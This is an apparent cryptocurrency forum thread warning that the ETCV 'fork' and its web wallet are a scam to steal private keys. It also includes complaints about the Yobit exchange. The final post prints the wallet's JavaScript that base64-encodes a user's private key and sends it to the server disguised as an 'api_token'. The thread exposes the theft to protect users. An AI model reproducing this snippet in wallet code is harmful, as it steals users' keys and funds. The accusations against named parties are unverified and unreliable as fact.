Their main wallet is banned, so you don't have to think about it and guess if it's a fraud or not, everyone knows it's a scam! It's a pity if people have entrusted their private keys with coins in their wallet.

Yeah I think too but you know it's better when old DTs tagged them. And better is when admin delete thread. As i said i'm not 100% sure, maybe 99.99% yes.

100% so... Guys accounts have been suspend for what I read.

Dafuq! Yobit listed ETCV. Not surprising as it is also a scammy exchange. I thought the Russian government closed it already. People wearing Yobit signature deserve red trusts definitely.
Yobit is currently blocked in Russia, in order to take a screenshot I had to enter using VPN. I hope that other countries will start blocking these scammers too.

I almost promote this one because the projects look good at first glance
Ehm no. Nothing ever looked good about that project.

Claiming they solved sharding/high tps before ETH developer did, out of nowhere, without money? Sure why not Cheesy And pigs can fly.

I almost promote this one because the projects look good at first glance, but when I saw there are a lot of high-rank members I have to settle for another, anyway those participated in the campaign will still get their stakes and trade them on Yobit, but careful trading trade I hope you will get paid for your efforts, although I consider this as a pump and dump coin.

Exchanges like yobit are just a shame for the community. The sums of the stolen eth are already approaching 100k$  Angry Lips sealed if you count the tokens that are also stolen from those who entered their private key. Proves again that greed leads to mistakes. Added merits to you measures for this important topic sure that you saved many new users.

agreed with you mate yobit like exchange is a poor evil for cryptocurrency community for sure peoples have to leave these scammy exchange yobit at its worst.  Cry

I still see some people Yobit signature I don't know if Yobit still offer signature campaign, or they are just a believer of Yobit, with so many complaints I wonder when will Yobit close their trading platform, we have so many exchanges coming in.

They still exist because people still use it. If you want exchange like Yobit to vanish then we need to decrease their users. Honestly I believe they'll run out of business sooner or later if they keep doing shady things, unless people are too blind to see it.

This is a big help to other people in the future to first research the project they are joining in. It still sad to see in their scam address have hacked many ETH wallets in just short of time. More like 104 ETH in total.

Even if this is already tradeable I will not buy this coin, the only exchange that will accept this scam coin is a scam exchange also like Yobit, you can buy and sell this on Yobit but you will end up gambling in their trading platform because all the volumes are all fake.
what I want to ask, is yobit indicated a scam recently, or indeed for a long time ?

I traded there in the past and I never had problem with them but users complained about waiting for withdrawal for several months, and yeah, they have shitty support. They don't care what they put on exchange.
I have traded also there. I was face problem regarding 2FA code on email address. I never received any code on my email till 6 month. 0.1BTC was there once BTC was almost 20K. I was unable to withdraw fund due to email verification code. I had submitted lots of support ticket. But unfortunately I had not got reply. After 6 month they send verification code on my mail. Then I withdraw my all fund immediately and never use anymore. But bad luck when I withdrawn BTC was 6K Sad. However I have loss by using Yobit and I don't trust them.

They list everything they can and they are not removing anything and exchange is full of scam coins, dead coins and "pump and dump" coins(also, not provably fair dice and some kind of weird investment scheme which looks like ponzi). I traded there in the past and I never had problem with them but users complained about waiting for withdrawal for several months, and yeah, they have shitty support. Look like OP Accusation is valid. Just now I have read a article on cointelgraph " Two Alleged Ethereum ‘Scam Forks’ Appropriating Users’ Private Keys, Report Finds" by Adrian Zmudzinski. After read full report I don't believe that the both fork are legit. There is enough evidence to called them scammer. Obviously few greedy people's will fall into it.

I have long suspected ETCV, because they claim that Ethereum's Fork but is an ERC20 token, which is obviously different from the fork we have seen in the past. It is more like using the official fork of Ethereum to improve oneself reputation. Whether it is scam or not, its motivation is very dark.

I was not sure it is scam for long, but when you start own coin with own blockchain you don't ask for ETH like that:

Quote
You can also purchase additional ETCV starting from now: send ETH to the contract address below, and you will receive intermediate ERC20 tokens (ETCV), which will be exchanged for Ethereum Classic Vision coins at a 1:1 ratio immediately after the fork, once the mainnet is launched. To buy your ETCV right now, simply transfer ETH to the contract address:
1 ETH = 50 ETCV
(I cleared the ETH-address — so noone would make a mistake sending there anything.)

And additionally, there were several questions in Telegram-chat of the ETCV about explorer, admin ignores all of them! Expecting people would insert privat keys from their wallets. So there could be no coin at all!

These two facts made me clearly see that is 100% scam!

This is indeed a scam I lost 24ETH today because of this stupid hardfork. Be careful about it guys.

Lot of people are trying to find out what happened, maybe you should give a little more infos on concerned thread, don't you think ?

Adding the quote from his thread for those interested.

Not sure how it adds up but it sure seems a lot of eth got transferred to that address recently...

Hi guys,

Today I lost my ETH automatically from my ledger nano s I didn't give my private keys to anyone and my hardware was also kept secure in safe place so as my recovery sheet. I contacted ledger support and didn't get any response yet, but it is weird to see all ETH gone from it. Below is the transaction details. I think I am not going to get it back but just wondering is there any hope?  Sad Cry

When we want to get the forked bitcoin then we need the private key to get it. Isn't it should work the same for Ether network? Move all the coins to a new wallet before creating a wallet for ETCV.

PS: I am not saying Ethereum Classic Vision is a scam nor saying legit. I still have not done any research about it.

I don't think you need any research, this is the link of their official wallet : https://etcvwallet.com/

https://i.imgur.com/gCZvLCQ.png

Nothing much needed mday. It's proved that this is a clear scam and fishy attempt to steal our money. By the way, why no dt still red tagged the user? It would save some of the noobs from being scammed.

Now they have this site https://etcv-wallet.com/    ( its open when u click WEBWALLET link on  https://ethereumcv.io/#wallets )

Exactly!

I can't believe so many people fell for this. It's Ethereum after all, people should know better, read the news, etc!
In the last 10 days, I have seen many people wear their avatars and signatures, in fact, there are more than 600 people who have signed up and taken part in their signature campaign... this is madness! I hope the number of people who might have lost their private keys is not that big.

Someone should tag ethclassicvision - the campaign manager.

Okay I got that but you know if someone don't tag, they will scam people for a lot of ETH. It worths to tag now. We are not on DT and it is why we can't tag, if we tag, no one will see it. by the way, are you on DT?

Tagged. However you should always tag yourself BEFORE asking DT to tag.
If you do so, maybe people will actually add you to their trust list, which is the point of the trust network.

DT should only be a default setting. Users who know better should have their own list.

Looking at the posts above it looks like they are not transparent yet. I will do my job. Hope the DTs will do too.

Againt this is not the "job" of DT.
Maybe you should read again how DT's are chosen and what it implies.

I know you know all this. So stop implying being a DT is an actual job or something.
People are DT based on the accuracy of their own trust list the feedback they leave. It shouldn't become a burden or alike.

Nothing much needed mday. It's proved that this is a clear scam and fishy attempt to steal our money. By the way, why no dt still red tagged the user? It would save some of the noobs from being scammed.

I guess because none of the DT users were yet confident enough this is a scam to actually tag the user.
It shouldn't be taken lightly to do so.

I myself haven't had the time to look deeply into that project, and won't tag it if not being sure enough I am not doing any harm to a legit project.

If you read about DT you will understand how you become DT and that it comes with hardly any obligation.
You are welcome to tag him yourself for now.

If you are using MetaMask and you click their WEB Wallet, it directly go to MetaMask extension and once its clicked this will pop up to your chrome browser.

I know it's to early to prove if they're scam, but fair enough we have been warned and unless a more legitimate evidence to be presented.

I think we have enough proof to show Ethereum Classic Vision is a scam, some guys already talk about it on Ethereum Nowa

Here is the thread : https://bitcointalksearch.org/topic/ann-etcv-ethereum-classic-vision-fork-31-of-ethereum-5089443

Of course no team...

~snip~

Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:

$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });
